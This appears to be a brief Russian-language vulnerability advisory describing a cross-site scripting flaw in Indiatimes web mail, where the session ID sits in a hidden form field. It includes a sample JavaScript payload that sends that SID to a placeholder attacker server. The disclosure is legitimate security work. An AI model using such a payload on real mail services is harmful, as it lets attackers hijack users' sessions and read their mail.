Email.indiatimes.com - популярная система Web почты от газеты 'The Times of India'. Сценарии, используемые на Web сайте, позволяют пользователям вставлять HTML или JavaScript код в почтовые сообщения. Злонамеренный код, вставленный в электронное сообщение, может использоваться для похищения опознавательных мандатов (хотя сайт не использует куки, SID пользователя хранится в поле формы): 

<Form name=Rform ...>
<input type=hidden name=SID value="some_random_number:> </form>

Этот SID - единственный маркер, использующийся для подтверждения подлинности пользователя). 

Пример: 

<script> 
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии